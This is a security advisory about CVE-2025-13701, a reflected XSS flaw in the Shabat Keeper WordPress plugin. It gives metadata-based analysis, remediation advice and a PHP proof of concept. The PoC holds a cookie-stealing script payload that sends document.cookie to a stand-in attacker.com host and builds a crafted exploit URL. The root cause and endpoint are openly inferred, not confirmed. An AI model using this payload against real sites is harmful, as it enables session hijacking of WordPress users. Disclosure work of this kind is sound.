Atomic Edge analysis of CVE-2025-13701 (metadata-based):
This vulnerability is a reflected cross-site scripting (XSS) flaw in the Shabat Keeper WordPress plugin. The vulnerability exists in all plugin versions up to and including 0.4.4. Attackers can inject arbitrary JavaScript via the $_SERVER[‘PHP_SELF’] parameter. The CVSS 3.1 score of 6.1 (Medium severity) reflects the attack’s network accessibility, low complexity, and requirement for user interaction.
Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping of the $_SERVER[‘PHP_SELF’] superglobal variable. WordPress plugins commonly use this variable to generate self-referencing URLs or form actions. The plugin likely echoes this variable directly into HTML output without proper escaping. This conclusion is inferred from the CWE-79 classification and the vulnerability description. No source code confirmation is possible because the vulnerable plugin version is unavailable for download.
Exploitation requires an attacker to craft a malicious link containing a JavaScript payload within the PHP_SELF parameter. The victim must click the link while authenticated to WordPress. The attack vector is reflected XSS, meaning the payload executes immediately in the victim’s browser context. A typical payload would be alert(document.cookie) or similar JavaScript to steal session cookies. The exact endpoint is unknown but likely involves a plugin administration page that improperly echoes $_SERVER[‘PHP_SELF’].
Remediation requires proper output escaping. The plugin should use WordPress escaping functions like esc_url() or esc_attr() before echoing $_SERVER[‘PHP_SELF’] into HTML attributes or URLs. Input sanitization of superglobals is generally unnecessary because they are server-defined. The primary fix is output escaping on all instances where this variable is printed. A patched version should also validate that the echoed value conforms to expected URL formats.
Successful exploitation allows attackers to execute arbitrary JavaScript in the context of an authenticated WordPress user. This can lead to session hijacking if administrative cookies are captured. Attackers could perform actions on behalf of the victim, such as changing plugin settings or creating new administrative users. The impact scope is limited to the privileges of the user who clicks the malicious link. Unauthenticated users cannot be directly targeted, but they could be tricked into performing actions if they have an active session.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13701 - Shabat Keeper <= 0.4.4 - Reflected Cross-Site Scripting via $_SERVER['PHP_SELF']
<?php
/**
* Proof of Concept for CVE-2025-13701
* This script demonstrates a reflected XSS attack against the Shabat Keeper plugin.
* The exact vulnerable endpoint is unknown, but the attack targets $_SERVER['PHP_SELF'] parameter reflection.
* Assumptions:
* 1. The plugin has an admin page that echoes $_SERVER['PHP_SELF'] without escaping.
* 2. The page is accessible via GET request.
* 3. The payload executes in the browser of an authenticated WordPress user.
*/
$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin.php?page=shabat-keeper';
// Malicious payload to steal session cookies
$payload = '<script>fetch("https://attacker.com/steal?c="+encodeURIComponent(document.cookie))</script>';
// Construct the attack URL.
// In a real attack, the payload would be part of the path that populates $_SERVER['PHP_SELF']
// Since we cannot control the server variable directly, this PoC simulates the attack vector.
// Actual exploitation requires the victim to visit a crafted URL where the path contains the payload.
echo "[+] Target: " . $target_url . "n";
echo "[+] Payload: " . $payload . "n";
echo "[!] This is a simulated PoC. Actual exploitation requires a malicious link like:";
echo "http://vulnerable-wordpress-site.com/wp-admin/" . urlencode($payload) . "/admin.php?page=shabat-keepern";
// Example cURL request to test if the endpoint exists (without payload)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code == 200) {
echo "[+] Endpoint responded with HTTP 200. Potential vulnerability may exist.n";
} else {
echo "[-] Endpoint responded with HTTP " . $http_code . ". Vulnerability may not be present or page requires authentication.n";
}
?>
